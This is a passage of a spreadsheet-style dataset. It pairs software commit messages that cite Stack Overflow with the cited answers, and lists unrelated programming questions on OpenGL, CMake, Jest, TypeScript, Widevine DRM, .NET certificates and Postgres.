            glBindBuffer(GL_ARRAY_BUFFER, self.sourceBuffer.get_id())
            # draw line back on itself, or else one endpoint won't be drawn
            WallCoords = derectify(wall.get_rect(), self.size)
            glLineWidth(1.5)
            glBufferData(
                GL_ARRAY_BUFFER, np.array(WallCoords, dtype=np.float32), GL_STATIC_DRAW
            )
            glVertexAttribPointer(
                self.shaderProgramDraw.vertexPositionAttribute,
                self.sourceBuffer.itemSize,
                GL_FLOAT,
                GL_FALSE,
                0,
                None,
            )
            self.setMatrixUniforms(self.shaderProgramDraw)
            glEnableVertexAttribArray(self.shaderProgramDraw.vertexPositionAttribute)
            glDrawArrays(GL_TRIANGLE_STRIP, 0, 6)
            glDisableVertexAttribArray(self.shaderProgramDraw.vertexPositionAttribute)
            glColorMask(GL_TRUE, GL_TRUE, GL_TRUE, GL_TRUE)
            glBindFramebuffer(GL_FRAMEBUFFER, 0)
    def on_render(self):
        print(&amp;quot;Starting render&amp;quot;)
        glUseProgram(self.shaderProgramMain.get_id())
        glBindFramebuffer(GL_FRAMEBUFFER, 0)
        glViewport(0, 0, self.width, self.height)
        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
        self.pMatrix = np.matrix(np.identity(4), np.float32)
        self.mvMatrix = np.matrix(np.identity(4), np.float32)
        self.mvMatrixStack.append(self.mvMatrix)
        # draw result
        glBindBuffer(GL_ARRAY_BUFFER, self.vertexPositionBuffer.get_id())
        glVertexAttribPointer(
            self.shaderProgramMain.vertexPositionAttribute,
            self.vertexPositionBuffer.itemSize,
            GL_FLOAT,
            False,
            0,
            0,
        )
        glBindBuffer(GL_ARRAY_BUFFER, self.vertexTextureCoordBuffer.get_id())
        glVertexAttribPointer(
            self.shaderProgramMain.textureCoordAttribute,
            self.vertexTextureCoordBuffer.itemSize,
            GL_FLOAT,
            False,
            0,
            0,
        )
        glActiveTexture(GL_TEXTURE0)
        glBindTexture(GL_TEXTURE_2D, self.renderTexture1.get_id())
        glUniform1i(self.shaderProgramMain.samplerUniform, 0)
        glUniform1f(self.shaderProgramMain.brightnessUniform, 1)
        glUniform3fv(
            self.shaderProgramMain.coloursUniform,
            len(self.colourScheme),
            self.colourScheme,
        )
        self.setMatrixUniforms(self.shaderProgramMain)
        glEnableVertexAttribArray(self.shaderProgramMain.vertexPositionAttribute)
        glEnableVertexAttribArray(self.shaderProgramMain.textureCoordAttribute)
        glDrawArrays(GL_TRIANGLE_STRIP, 0, self.vertexPositionBuffer.numItems)
        glDisableVertexAttribArray(self.shaderProgramMain.vertexPositionAttribute)
        glDisableVertexAttribArray(self.shaderProgramMain.textureCoordAttribute)
        self.mvMatrixStack.pop()
        pygame.display.flip()
        print(&amp;quot;Render complete&amp;quot;)
    def on_cleanup(self):
        pygame.quit()
    def on_execute(self):
        if self.on_init() == False:
            self.running = False
        # Add sources and walls
        self.add_source([self.width / 2, self.height / 2], 1, 10, 50)
        self.add_source([(self.width / 2) + 200, (self.height / 2) + 200], 2, 10, 50)
        self.add_wall([300, 300], [10, 100], 3)
        # Run the main loop
        while self.running:
            for event in pygame.event.get():
                self.on_event(event)
            self.on_loop()
            self.on_render()
        self.on_cleanup()
    def add_drag(self, pos, size, id):
        # adds a draggable object at position [x,y], of size [width,height]
        item = item_draggable.Item(pos, size, id)
        self.dragItems.append(item.hitbox())
    def add_source(self, pos, id, frequency, amplitude):
        source = Source(pos, id, frequency, amplitude)
        self.sources.append(source)
        self.add_drag(pos, [8, 8], id)
    def add_wall(self, pos, size, id):
        wall = Medium(pos, size, id, 0)
        self.walls.append(wall)
        self.add_drag(pos, size, id)
    def prep_draw(self):
        rttFramebuffer = self.renderTexture1.framebuffer
        glBindFramebuffer(GL_FRAMEBUFFER, rttFramebuffer.get_id())
        glViewport(0, 0, rttFramebuffer.width, rttFramebuffer.height)
        glUseProgram(self.shaderProgramDraw.get_id())
        # blue channel used for walls and media
        glColorMask(False, False, True, False)
        glVertexAttrib4f(self.shaderProgramDraw.colourAttribute, 0.0, 0.0, 0.0, 1.0)
    def load_shader(self, shader_file):
        f = open(shader_file, &amp;quot;r&amp;quot;)
        shader_source = f.read()
        if shader_source:
            if &amp;quot;fs&amp;quot; in shader_file:
                shader = compileShader(shader_source, GL_FRAGMENT_SHADER)
            elif &amp;quot;vs&amp;quot; in shader_file:
                shader = compileShader(shader_source, GL_VERTEX_SHADER)
            else:
                return None
            glCompileShader(shader)
            if not glGetShaderiv(shader, GL_COMPILE_STATUS):
                print(
                    f&amp;quot;Shader compile error in {shader_file}: {glGetShaderInfoLog(shader)}&amp;quot;
                )
            return shader
        else:
            print(&amp;quot;Shader not found&amp;quot;)
            return None
            # error handling
    def create_shader(self, fs, vs):
        try:
            frag_shader = self.load_shader(fs)
        except:
            print(&amp;quot;Fragment shader not found&amp;quot;)
            return None
        try:
            vert_shader = self.load_shader(vs)
        except:
            print(&amp;quot;Vertex shader not found&amp;quot;)
            return None
        match fs:
            case &amp;quot;shaders/display-fs.glsl&amp;quot;:
                shader = ShaderMain(glCreateProgram())
            case &amp;quot;shaders/simulate-stat-fs.glsl&amp;quot;:
                shader = ShaderSimulate(glCreateProgram())
            case &amp;quot;shaders/simulate-prog-fs.glsl&amp;quot;:
                shader = ShaderSimulate(glCreateProgram())
            case _:
                shader = Shader(glCreateProgram())
        glAttachShader(shader.get_id(), vert_shader)
        glAttachShader(shader.get_id(), frag_shader)
        glLinkProgram(shader.get_id())
        glUseProgram(shader.get_id())
        shader.vertexPositionAttribute = glGetAttribLocation(shader.get_id(), &amp;quot;aVPos&amp;quot;)
        shader.textureCoordAttribute = glGetAttribLocation(shader.get_id(), &amp;quot;aTexCoord&amp;quot;)
        shader.dampingAttribute = glGetAttribLocation(shader.get_id(), &amp;quot;aDamping&amp;quot;)
        shader.colourAttribute = glGetAttribLocation(shader.get_id(), &amp;quot;aColour&amp;quot;)
        shader.pMatrixUniform = glGetUniformLocation(shader.get_id(), &amp;quot;uPMatrix&amp;quot;)
        shader.mvMatrixUniform = glGetUniformLocation(shader.get_id(), &amp;quot;uMVMatrix&amp;quot;)
        shader.samplerUniform = glGetUniformLocation(shader.get_id(), &amp;quot;uSampler&amp;quot;)
        if not glGetShaderiv(frag_shader, GL_COMPILE_STATUS):
            print(&amp;quot;Fragment shader compile error:&amp;quot;, glGetShaderInfoLog(frag_shader))
        if not glGetShaderiv(vert_shader, GL_COMPILE_STATUS):
            print(&amp;quot;Vertex shader compile error:&amp;quot;, glGetShaderInfoLog(vert_shader))
        return shader
    def setPosRect(self, x1, y1, x2, y2):
        points = derectify([x2, y1, x1, y1, x2, y2, x1, y1, x2, y2, x1, y2], self.size)
        for i in range(5):
            xi = points[i * 2]
            yi = points[i * 2 + 1]
            self.simPosition.append(-1 + (2 * xi / self.width))
            self.simPosition.append(-1 + (2 * yi / self.height))
            self.simTextureCoord.append(xi / self.width)
            self.simTextureCoord.append(1 - yi / self.height)
            damp = self.damping
            if xi == 1 or yi == 1 or xi == self.width - 1 or yi == self.height - 1:
                damp = damp * 0.91
            self.simDamping.append(damp)
    def setMatrixUniforms(self, shader):
        glUniformMatrix4fv(shader.pMatrixUniform, 1, False, self.pMatrix)
        glUniformMatrix4fv(shader.mvMatrixUniform, 1, False, self.mvMatrix)
    def initTextureFramebuffer(self):
        framebuffer = np.empty(1, dtype=np.uint32)
        glCreateFramebuffers(1, framebuffer)
        fb = Framebuffer(framebuffer[0])
        glBindFramebuffer(GL_FRAMEBUFFER, fb.get_id())
        fb.set_width(self.width)
        fb.set_height(self.height)
        texture = np.empty(1, dtype=np.uint32)
        glCreateTextures(GL_TEXTURE_2D, 1, texture)
        tx = Texture(int(texture[0]), fb)
        glBindTexture(GL_TEXTURE_2D, tx.get_id())
        glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)
        glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)
        glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_EDGE)
        glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_EDGE)
        glTexStorage2D(GL_TEXTURE_2D, 1, GL_RGBA8, tx.get_width(), tx.get_height())
        glFramebufferTexture2D(
            GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, GL_TEXTURE_2D, tx.get_id(), 0
        )
        status = glCheckFramebufferStatus(GL_FRAMEBUFFER)
        if status != GL_FRAMEBUFFER_COMPLETE:
            print(f&amp;quot;Framebuffer error: {status}&amp;quot;)
            return None
        else:
            print(&amp;quot;Framebuffer initialized successfully&amp;quot;)
        glBindTexture(GL_TEXTURE_2D, 0)
        glBindFramebuffer(GL_FRAMEBUFFER, 0)
        return tx
if __name__ == &amp;quot;__main__&amp;quot;:
    WaveSim = App(title=&amp;quot;WaveSim&amp;quot;)
    WaveSim.on_execute()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I've done something wrong or more info would be helpful please let me know, it's my first time using stackoverflow as the only advice I could find was to check all the openGL objects aforementioned. I suspect there is some kind of issue with my use of the textures, but I honestly don't understand where I could've made a mistake&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/9nugipoK.png" rel="nofollow noreferrer"&gt;Blank window&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C284</t>
  </si>
  <si>
    <t>Optional Chaining &amp;&amp; Nullish Coalescing
Smoothed out the component methods to handle null cases more specifically! Big thanks to new JavaScript standards, it's super nice to work with!
(Going to use this in a later update) https://stackoverflow.com/questions/28900077/why-is-event-target-not-element-in-typescript/50326668#50326668
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/Optional_chaining
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/Nullish_coalescing</t>
  </si>
  <si>
    <t>It doesn't inherit from Element because not all event targets are elements.
From MDN:
Element, document, and window are the most common event targets, but other objects can be event targets too, for example XMLHttpRequest, AudioNode, AudioContext, and others.
Even the KeyboardEvent you're trying to use can occur on a DOM element or on the window object (and theoretically on other things), so right there it wouldn't make sense for evt.target to be defined as an Element.
If it is an event on a DOM element, then I would say that you can safely assume evt.target. is an Element. I don't think this is an matter of cross-browser behavior. Merely that EventTarget is a more abstract interface than Element.
Further reading: https://github.com/Microsoft/TypeScript/issues/29540</t>
  </si>
  <si>
    <t xml:space="preserve">I've just learned what ASP.NET MVC is and I'm wondering if the pattern is ever used in Windows Desktop application development?  
I'm specifically looking at potentially trying to use it in a Desktop .NET application. 
Please forgive me if this question is way out in left field in terms of how MVC is suppose to be used. I'm still trying to wrap my head around the details of it.
</t>
  </si>
  <si>
    <t>C285</t>
  </si>
  <si>
    <t>dremote: add hidden HTML elements for each inactive component, implem
ent with existing flash msg by getting text from inside &lt;p&gt; (see https://stackoverflow.com/questions/43344335/how-to-get-text-inside-p-tag)</t>
  </si>
  <si>
    <t>Using Jquery You can use
on
method for adding click event to button and using
#id
selector we can get / set the text for the
p
tag
$('#Change').on('click', function()
{
  $('#testprint').text('Change String Success');
});
$('#Generate').on('click', function() 
{
  $('#testprint').text('Generated New String'); 
});
$('#getStr').on('click', function() 
{ 
  $('#getString').text( $('#testprint').text() ); 
});
&lt;script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"&gt;&lt;/script&gt;
&lt;p id="testprint"&gt;Original String&lt;/p&gt;
&lt;p id="getString"&gt; EMPTY  &lt;/p&gt;
&lt;button id="Generate"&gt;Generate&lt;/button&gt;
&lt;button id="Change"&gt;Change&lt;/button&gt;
&lt;button id="getStr"&gt;Get String to first "p" tag&lt;/button&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to allow video players such as PRESTOplay, Bitmovin, TheoPlayer, ExoPlayer, and Shaka Player to play my own Widevine DRM-protected content.&lt;/p&gt;
&lt;p&gt;My Setup:
I plan to use Shaka Packager for packaging the content and creating the DASH manifest.
I also want to use my own key server instead of relying on other DRM providers.
Understanding the Packaging Process:
I understand the basics of encrypting content using Shaka Packager. Specifically, I need to provide the signer, aes_signing_key, aes_signing_iv,key_server_url.&lt;/p&gt;
&lt;p&gt;Once provided, Shaka Packager generates a response containing:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;response (which includes encryption data)&lt;/li&gt;
&lt;li&gt;signature (used for verification)
I assume my key server should store this encryption data for later retrieval.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;What I Don't Understand&lt;/strong&gt;&lt;/em&gt;: The Player License Requests
Each video player (e.g., Bitmovin, ExoPlayer, Shaka Player) allows specifying a custom license server URL.&lt;/p&gt;
&lt;p&gt;When a player requests a license, it sends two requests to the license server.
The request payloads are described in this Stack Overflow question (&lt;a href="https://stackoverflow.com/questions/49509733/widevine-drm-body-request-payload"&gt;Widevine DRM - Body request payload&lt;/a&gt;).
My Questions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;What is inside the Widevine request payload?
The first request contains a binary payload like &lt;code&gt;0x080x04&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;What should my Custom License Server return?
How should I structure my first response (to the &lt;code&gt;0x080x04&lt;/code&gt; request)?
What should I return in the second response?
What information does this payload contain?
Can I decode it to understand its contents?
How do I integrate the encryption metadata obtained from Shaka Packager into my license serverâ€™s responses?&lt;/li&gt;
&lt;li&gt;Do I need Widevine DRM Server SDK or Widevine Cloud License Server?
Does my custom license server need to call Google's Widevine DRM Server SDK or Widevine Cloud License Server?
If yes, do I need to become a Certified Widevine Implementation Partner (CWIP) (&lt;a href="https://www.widevine.com/training" rel="nofollow noreferrer"&gt;https://www.widevine.com/training&lt;/a&gt;) or a Widevine Provider (&lt;a href="https://www.widevine.com/solutions/widevine-providers" rel="nofollow noreferrer"&gt;https://www.widevine.com/solutions/widevine-providers&lt;/a&gt;) to gain access?
If no, how do I know what the responses should be?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Any help, including documentation references, example implementations, or explanations, would be greatly appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C286</t>
  </si>
  <si>
    <t>Adding target_include_directories directive to auto include headers. 
This is useful when an external project uses sdsl-lite as a component via add_subdirectory(...) command. Extracted from http://stackoverflow.com/a/18697099 .</t>
  </si>
  <si>
    <t>Since CMake 2.8.11 you can use target_include_directories. Just simply add in your DEPENDENCY project this function and fill in include directories you want to see in the main project. CMake will care the rest.
PROJECT, CMakeLists.txt:
cmake_minimum_required (VERSION 2.8.11)
project (Project)
include_directories (Project)
add_subdirectory (Dependency)
add_executable (Project main.cpp)
target_link_libraries (Project Dependency)
DEPENDENCY, CMakeLists.txt
project (Dependency)
add_library (Dependency SomethingToCompile.cpp)
target_include_directories (Dependency PUBLIC include)</t>
  </si>
  <si>
    <t xml:space="preserve">I've recently asked a question on StackoverFlow about the MVC: [external-link]
Based on the answer provided I started research on how this would be implemented in a Windows form Application. I came upon the following CodeProject article: [external-link]
In the comments below the article, certain users argue that (although this is a good article) it is actually the observer pattern. First, but less important, question is does anyone agree or disagree with that and why? 
Regarding the second and more important question: I'm trying to build a small task list program in .NET. It will be very tiny and hopefully fast. In general, what would be a better architecture for such a project? The Observer Pattern or the MVC Pattern? Or another pattern? 
Thank you
</t>
  </si>
  <si>
    <t>C287</t>
  </si>
  <si>
    <t>Add propTypes and ignore ESLint props validation
- ESLint interprets columns.render as a component, which is not correct
- https://stackoverflow.com/questions/54997918/eslint-throws-an-is-missing-in-props-validation-error-when-use-destructuring-i</t>
  </si>
  <si>
    <t>It's not about destructuring, it's just because eslint interprets
columns.render
as a component and asks that you document its props.
You can still define
columns.render.propTypes
to satisfy eslint.
const columns = [
        {
            field: 'description',
            // The parameter is row data object
            render: ({ id, description }) =&gt; (
                &lt;Tooltip title={ id }&gt;
                    &lt;div&gt;
                        { description }
                    &lt;/div&gt;
                &lt;/Tooltip&gt;
            )
        }
    ];
    columns.render.propTypes = {
        id: PropTypes.string,
        description: PropTypes.string,
    };</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to configure the .NET HTTPS development certificate on Ubuntu 24.04, but Edge and Chrome do not recognize it as a trusted certificate.&lt;/p&gt;
&lt;p&gt;What I Have Done So Far:
Cleaned and regenerated the certificate:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dotnet dev-certs https --clean
dotnet dev-certs https
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Exported the certificate:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dotnet dev-certs https -ep ~/.aspnet/https/dotnet-dev-cert.pfx -p mypassword
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Converted the certificate to CRT format:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;openssl pkcs12 -in ~/.aspnet/https/dotnet-dev-cert.pfx -clcerts -nokeys -out ~/.aspnet/https/dotnet-dev-cert.crt -passin pass:mypassword
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Moved the certificate to the trusted store:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sudo cp ~/.aspnet/https/dotnet-dev-cert.crt /usr/local/share/ca-certificates/dotnet-dev-cert.crt
sudo chmod 644 /usr/local/share/ca-certificates/dotnet-dev-cert.crt
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Updated the system CA certificates:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sudo update-ca-certificates --verbose
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Verified that the certificate is correctly installed:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;openssl x509 -noout -text -in /usr/local/share/ca-certificates/dotnet-dev-cert.crt
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Checked with dotnet dev-certs:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dotnet dev-certs https --check --verbose
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;A valid certificate was found: 318C61EC862324710949E1644B09097C4FBB0CF5 - CN=localhost - Valid from 2025-02-19 to 2026-02-19 - IsHttpsDevelopmentCertificate: true - IsExportable: true
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Checked if the certificate works with curl:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;curl -v https://localhost:44352
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Result: It connects successfully, the certificate is verified, and I get an HTTP/2 301 response.&lt;/p&gt;
&lt;p&gt;Browsers still do not trust the certificate:&lt;/p&gt;
&lt;p&gt;Edge and Chrome show NET::ERR_CERT_AUTHORITY_INVALID when trying to access https://localhost:44352.
I checked edge://net-internals/#hsts and chrome://net-internals/#hsts, and localhost is not listed.
I also tried clearing site data in edge://settings/clearBrowserData, but the issue persists.
Expected Behavior
The browser should recognize the .NET HTTPS Development Certificate as trusted.
https://localhost:44352 should work without certificate warnings.
Actual Behavior
The browser still shows NET::ERR_CERT_AUTHORITY_INVALID, even though the certificate is correctly installed at the system level.
Additional Info
OS: Ubuntu 24.04
.NET SDK: 8.0.403
Browsers: Microsoft Edge 121.0, Google Chrome 121.0
How can I make Edge and Chrome trust the .NET HTTPS development certificate in Ubuntu 24.04?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C288</t>
  </si>
  <si>
    <t>Add starter tests for App and NavBar
- Remove name tag from Form.Item in Facets component
- Add matchMedia to issue https://stackoverflow.com/questions/39830580/jest-test-fails-typeerror-window-matchmedia-is-not-a-function</t>
  </si>
  <si>
    <t>The Jest documentation now has an "official" workaround:
Object.defineProperty(window, 'matchMedia', {
  writable: true,
  value: jest.fn().mockImplementation(query =&gt; ({
    matches: false,
    media: query,
    onchange: null,
    addListener: jest.fn(), // Deprecated
    removeListener: jest.fn(), // Deprecated
    addEventListener: jest.fn(),
    removeEventListener: jest.fn(),
    dispatchEvent: jest.fn(),
  })),
});
Mocking methods which are not implemented in JSDOM</t>
  </si>
  <si>
    <t xml:space="preserve">Do we really need a server side architecture to create a RIA application?
My idea is the following:
Create a complete RIA application using only Html pages, JQuery and a full client side UI set of components (choose your poison between the large number of different components available open source and not)
Server side I have just one or more REST like web services that returns and accepts Json serialized objects
No more dependency on the latest trend on server side architecture (Struts, Java faces, Asp.Net, MVC or any other model that was trendy sometime ago or is trendy now), web server side will be just an interface between trasnsport (Json) and the business logic layer, with very few logic in it.
Client side we'll have a huge JavaScript application, but with modern browsers and PCs (for speed) and modern development environment for ease of maintenance (VS2008 and other tools debug JavaScript very well) I see less a problem in code maintenance for this layer than finding the developer that know the correct server layer architecture...
Do you have comment on this scenario?
Ciao
Massimo
</t>
  </si>
  <si>
    <t>C289</t>
  </si>
  <si>
    <t>FIX: Ensure category/tag classes are added and removed correctly (#16
003)
The use of a `/g` regex was causing some surprising, seemingly random, behavior. (https://stackoverflow.com/a/1520853/5913559)
There was also a known issue which would cause inconsistent class behavior when running the 'loading slider' theme component.
This commit takes the opportunity to refactor the component to remove the use of observers and remove the regex-based class parsing.</t>
  </si>
  <si>
    <t>A RegExp object with the g flag keeps track of the lastIndex where a match occurred, so on subsequent matches it will start from the last used index, instead of 0. Take a look:
var query = 'Foo B';
var re = new RegExp(query, 'gi');
console.log(re.lastIndex);
console.log(re.test('Foo Bar'));
console.log(re.lastIndex);
console.log(re.test('Foo Bar'));
console.log(re.lastIndex);
If you don't want to manually reset lastIndex to 0 after every test, just remove the g flag.
Here's the algorithm that the specs dictate (section 15.10.6.2):
RegExp.prototype.exec(string)
Performs a regular expression match of string against the regular expression and returns an Array object containing the results of the match, or null if the string did not match The string ToString(string) is searched for an occurrence of the regular expression pattern as follows:
Let R be this RexExp object.
Let S be the value of ToString(string).
Let length be the length of S.
Let lastIndex be the value of the lastIndex property on R.
Let i be the value of ToInteger(lastIndex).
If the global property is false, let i = 0.
If i &lt; 0 or i &gt; length then set the lastIndex property of R to 0 and return null.
Call [[Match]], giving it the arguments S and i. If [[Match]] returned failure, go to step 9; otherwise let r be its State result and go to step 10.
Let i = i+1.
Go to step 7.
Let e be r's endIndex value.
If the global property is true, set the lastIndex property of R to e.
Let n be the length of r's captures array. (This is the same value as 15.10.2.1's NCapturingParens.)
Return a new array with the following properties:
The index property is set to the position of the matched substring within the complete string S.
The input property is set to S.
The length property is set to n + 1.
The 0 property is set to the matched substring (i.e. the portion of S between offset i inclusive and offset e exclusive).
For each integer i such that i &gt; 0 and i ≤ n, set the property named ToString(i) to the ith element of r's captures array.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a stored procedure in Postgres which I'm calling from VBA (or PowerShell). On one machine after executing the stored procedure, the OUT parameter contains the value set in SQL. On another machine the OUT parameter is set to an empty string in all situations (even if it starts as NULL). I don't have access to PgAdmin on these machines.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Question&lt;/strong&gt;: any ideas why you might see &lt;em&gt;this&lt;/em&gt; inconsistent behaviour?&lt;/p&gt;
&lt;p&gt;For example - there is a gotcha in SQL Server, where if you don't specify OUT for a parameter it doesn't populate the output variable. However you can't use OUT as part of a Postgres procedure call (+ the OUT should be taken care of in the parameter object).&lt;/p&gt;
&lt;p&gt;Test procedure:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE PROCEDURE public.example(OUT message VARCHAR(100)) LANGUAGE plpgsql AS
$$
BEGIN
    message := 'Something';
END;
$$;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Test PowerShell code (exactly the same behaviour can be see in VBA and PowerShell).&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Define connection details
$connectionString = &amp;quot;Driver={PostgreSQL Unicode};Server=...;Port=5432;Database=postgres;Uid=postgres;Pwd=...;&amp;quot;
# Load System.Data.Odbc assembly
Add-Type -AssemblyName System.Data
$connection = New-Object System.Data.Odbc.OdbcConnection($connectionString)
$connection.Open()
$command = $connection.CreateCommand()
$outputParam = New-Object System.Data.Odbc.OdbcParameter
$outputParam.Direction = [System.Data.ParameterDirection]::Output
$outputParam.Value = $null
$outputParam.ParameterName = &amp;quot;message&amp;quot;
$outputParam.DbType = [System.Data.Odbc.OdbcType]::VarChar
$outputParam.Size = 100
$command.Parameters.Add($outputParam)
$command.CommandType = [System.Data.CommandType]::Text
$command.CommandText = &amp;quot;{ CALL public.example(?) }&amp;quot;
Write-Output $command.Parameters.Count
Write-Output $command.CommandText
# Execute the command
$command.ExecuteNonQuery
# Retrieve the output parameter value
$outputValue = $outputParam.Value
Write-Output &amp;quot;Output Parameter Value: $outputValue&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This code running on my home computer against an RDS instance is returning an empty string for the output.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C29</t>
  </si>
  <si>
    <t>Step 2 towards expanding menu icon - need JavaScript
And JS must be in &lt;body&gt; - see: https://getbootstrap.com/docs/5.1/getting-started/introduction/#starter-template
Moreover, we want CSS in &lt;head&gt;
And reuse that all for all templates
so, use base.html template:
https://ultimatedjango.com/learn-django/lessons/create-the-project-base-template/
You can also make it project-wide - cross apps:
https://stackoverflow.com/questions/14720464/django-project-base-template
(search "where to place the base.html file")</t>
  </si>
  <si>
    <t>Sure you can. A quick example of a base.html
&lt;!DOCTYPE html&gt;
&lt;html&gt;
    &lt;head&gt;
        &lt;title&gt;My Project&lt;/title&gt;
    &lt;/head&gt;
    &lt;body&gt;
    {% block content %}{% endblock content %}
    &lt;/body&gt;
&lt;/html&gt;
And say you have a app called myapp with a view.html page,
{% extends "base.html" %}
{% block content %}
    &lt;h2&gt;Content for My App&lt;/h2&gt;
    &lt;p&gt;Stuff etc etc.&lt;/p&gt;
{% endblock content %}
Take some time to
read the docs
for more information</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="https://i.sstatic.net/oJSFwfIA.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/oJSFwfIA.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I have 3 Lists in my Flutter Project; How can I collect them in one list using Class and constructor in Flutter ?&lt;/p&gt;
&lt;p&gt;my three lists;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;one has three question&lt;/li&gt;
&lt;li&gt;second has image&lt;/li&gt;
&lt;li&gt;third has true or false&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I want to collect them  in one list.&lt;/p&gt;
&lt;p&gt;I tried:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Question {
  late String questionText; 
  late String questionImage; 
  late bool questionAnswer; 
  Question({String q, String i, bool a}) { 
    questionText = q; 
    questionImage = i; 
    questionAnswer = a; 
  } 
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;it shows error in this line&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C290</t>
  </si>
  <si>
    <t>(1) Feat: adjusted the logic for SelectorButton so that we can allow 
for Banking Brands to be passed in to the components
(2) BugFix: we can now conditionally render buttons depending on props provided. Previously they had to have a PaymentBrand or BankingBrand passed through - reference added below.
Why?
(1) - we want our components to be scalable beyond to the icons we can find on FontAwesome. To do this, we need to be able to variably pass props into the components
&gt; now it is optional to either pass PaymentBrands or BankingBrands in. This allows for the component to render conditionally dependingon the information provided.
(2)&gt; https://stackoverflow.com/questions/54496398/typescript-type-string-undefined-is-not-assignable-to-type-string
&gt; the guide above helped us to debug an issue we were running into</t>
  </si>
  <si>
    <t xml:space="preserve">You can now use the non-null assertion operator that is here exactly for your use case.
It tells TypeScript that even though something looks like it could be null, it can trust you that it's not:
let name1:string = person.name!; 
//                            ^ note the exclamation mark here  </t>
  </si>
  <si>
    <t xml:space="preserve">I'm writing an error handling module for a fairly complex system architected into layers. Sometimes our data layer throws obscure exceptions.
It would be really handy to log out the values of the parameters of the method that threw the exception. 
I can reflect on the TargetSite property of the exception to find the method's parameter types and names, but I don't seem to be able to get the values... am I missing something?
Dupe
[external-link]
</t>
  </si>
  <si>
    <t>C291</t>
  </si>
  <si>
    <t>Update BottomNavigationView backstack control
https://stackoverflow.com/questions/58262507/how-to-manage-bottomnavigationview-backstack-in-android-navigation-component#:~:text=By%20default%2C%20the%20back%20stack,items%20used%20with%20your%20BottomNavigationView%20.</t>
  </si>
  <si>
    <t>As per the documentation on onNavDestinationSelected() (the method that setupWithNavController() uses when selecting a MenuItem):
By default, the back stack will be popped back to the navigation graph's start destination. Menu items that have android:menuCategory="secondary" will not pop the back stack.
So just add android:menuCategory="secondary" to each of the menu items used with your BottomNavigationView.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I receive operations logs, one per line, in an &lt;code&gt;$input_file&lt;/code&gt;: each line describes which resources were used (printers, scanners, etc.) Below are examples of valid lines:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;crap I don't care [] # This should not happen, but sometimes it does
crap I don't care [Printer DVX500]
crap I really do not care [Printer DV650V &amp;amp; Scanner SON2000]
some other crap [Printer DVX500 &amp;amp; Printer DV650V &amp;amp; Scanner SON2000]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have no control over how these lines are produced. I only know that the
resources are supposed to be described at the end of each line, between square brackets (&lt;code&gt;[...]&lt;/code&gt;). Sometimes, like in the first line above, it is empty; sometimes, several resources are used, in which case resources are separated with &lt;code&gt;$SEP&lt;/code&gt; (&lt;code&gt;$SEP==&amp;quot;&amp;amp;&amp;quot;&lt;/code&gt; in the examples).&lt;/p&gt;
&lt;p&gt;For usage purposes, I need to produce a sorted list of (unique) resources in an
&lt;code&gt;$output_file$&lt;/code&gt;. The following code works, and follows these steps:&lt;/p&gt;
&lt;ol&gt;
